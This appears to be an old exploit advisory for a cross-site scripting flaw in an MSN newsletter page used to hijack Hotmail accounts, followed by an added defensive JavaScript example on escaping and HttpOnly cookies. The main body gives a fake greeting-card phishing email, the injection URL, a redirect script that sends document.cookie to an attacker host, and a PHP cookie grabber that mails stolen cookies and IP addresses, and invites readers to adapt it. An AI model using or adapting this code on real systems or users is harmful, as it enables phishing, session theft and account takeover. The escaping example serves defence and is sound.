Hotmail/MSN Cross Site Scripting Exploit
Author: Simo64
Contact: simo64_at_morx_dot_org
Discovered: 07/25/2006
Published: 08/10/2006
Vendor: MSN.com
Service: Hotmail.com Webmail Service
Vulnerability: Cross Site Scripting (Cookie-Theft)
Severity: Medium/High
Tested on: IE 6.0 (designed for), Firefox 1.5 and Opera (should work on all browsers)
Morx Security Research Team
http://www.morx.org
Description:
A PHP exploit for a cross-site scripting vulnerability in the 'RE' variable of
newsletters.msn.com/xs-v3/insite.asp on the MSN.com website. The exploit
requires the victim to open an email sent by the attacker and click on a URL,
so some social engineering skills are required too.
Exploitation:
Exploiting this vulnerability can be done by uploading the following script to
a PHP-enabled web server, then sending the victim an email containing the link
to the script, http://www.attacker-server.com/ecard.php, which redirects to the
vulnerable MSN site. As an example, the email can be sent as a greeting card
with the following HTML code. You may also need to modify some things in the
ecard.php exploit to make it fit your needs.
Hello, </p>
Alias has just sent you a greeting card. </p>
To view your greeting card, click on the link below: </p>
<a href="http://attacker-site/ecard.php"> http://
lycos.americangreetings.com/view.pd?i=197484541&m=8381&rr=y&source=lycos
</a> </p>
Or copy and paste the above link into your web browser's address window</p>
Or enter this eCard number 9584B7E784 on our eCard Pick Up page at
www.americangreetings.com</p>
Thanks for using Lycos Greetings with AmericanGreetings.com
------------------------ Hotmail/MSN accounts XSS Xploit by Simo64 ----------------------
Exploit:
http://newsletters.msn.com/xs-v3/insite.asp?CU=1&RE=')></script><script src=http://attacker/redir.js>
where the redir.js code is:
location.href='http://attacker-site/a.php?cookie='+escape(document.cookie)
and a.php, as the cookie grabber, may use the following code:
<?
$cookie = $_GET['cookie'];
$ip = getenv("REMOTE_ADDR");
$msg = "Cookie: $cookie\nIP Address: $ip";
$subject = "cookie";
mail("[email protected]", $subject, $msg);
header("location: http://www.americangreetings.com/view.pd?i=405014155&m=6355&source=ag999");
?>
The ecard.php page may contain a simple PHP or JavaScript redirection to the
exploit link :)
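Server-side fix for this class of bug, as an added example that is not part of the original advisory or of MSN's code. It assumes, from the shape of the payload, that RE was echoed inside a single-quoted JavaScript string in an inline script block; go() and the cookie name are hypothetical.

```javascript
// Added example, not from the advisory or from MSN's code.
// Assumption: RE was echoed inside a single-quoted JavaScript string in an
// inline <script> block; go() is a hypothetical stand-in for the page's code.

// Constructed sample: the RE value from the advisory's exploit URL.
const PAYLOAD = "')></script><script src=http://attacker/redir.js>";

// Vulnerable pattern: the raw parameter is concatenated into the script.
function renderUnsafe(re) {
  return "<script>go('" + re + "')</script>";
}

// Escape for a JS string literal that lives inside an HTML <script> element.
// Everything outside a small safe set becomes \uXXXX, so the value cannot
// close the string (' or \), the call, or the element (< > /).
function jsStringEscape(value) {
  return String(value).replace(/[^A-Za-z0-9 ,._-]/g, (ch) =>
    "\\u" + ch.charCodeAt(0).toString(16).padStart(4, "0"));
}

function renderSafe(re) {
  return "<script>go('" + jsStringEscape(re) + "')</script>";
}

// Number of <script> elements a browser would open in the markup.
function countScriptOpens(html) {
  return (html.match(/<script/gi) || []).length;
}

// Defence in depth: an HttpOnly session cookie is not visible to
// document.cookie, which is what redir.js reads.
function sessionCookie(name, value) {
  return name + "=" + encodeURIComponent(value) +
    "; Path=/; Secure; HttpOnly; SameSite=Lax";
}

console.log(renderUnsafe(PAYLOAD));
console.log(renderSafe(PAYLOAD));
console.log("Set-Cookie: " + sessionCookie("session", "constructed-value"));
```

The unsafe rendering opens a second script element that loads redir.js; the escaped rendering keeps the whole value inside the string literal.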
Disclaimer:
This entire document is for educational, testing and demonstration purposes
only. Modification, use and/or publishing of this information is entirely at
your OWN risk. The information provided in this advisory is to be used/tested
on your OWN machine/account. I cannot be held responsible for any of the above.